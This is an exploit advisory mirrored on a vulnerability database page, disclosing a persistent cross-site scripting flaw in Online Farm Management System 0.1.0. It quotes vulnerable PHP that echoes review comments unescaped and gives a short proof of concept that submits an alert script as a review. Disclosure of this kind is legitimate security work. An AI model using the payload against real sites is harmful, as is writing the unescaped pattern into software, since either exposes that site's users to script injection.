Lucene search
K

Online Farm Management System 0.1.0 Cross Site Scripting

🗓️ 16 Jul 2020 00:00:00Reported by KeopssGroup0day IncType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 402 Views

Online Farm Management System 0.1.0 Persistent Cross-Site Scripting vulnerabilit

Code
`# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting  
# Date: 2020-06-29  
# Exploit Author: KeopssGroup0day,Inc  
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html  
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/  
# Version: 0.1.0  
# Tested on: Kali Linux  
  
Source code(review.php):  
<?php  
if($result) :  
while($row1 = $result->fetch_array()) :  
?>  
<div class="con">  
<div class="row">  
<div class="col-sm-4">  
<em style="color: black;"><?= $row1['comment']; ?></em>  
</div>  
  
  
POC:  
  
1. http://192.168.1.58/a/review.php?pid=31 go  
2. We send the payload (<script>alert(1)</script>)  
3. Write a review payload and submit  
4. And refresh the page  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation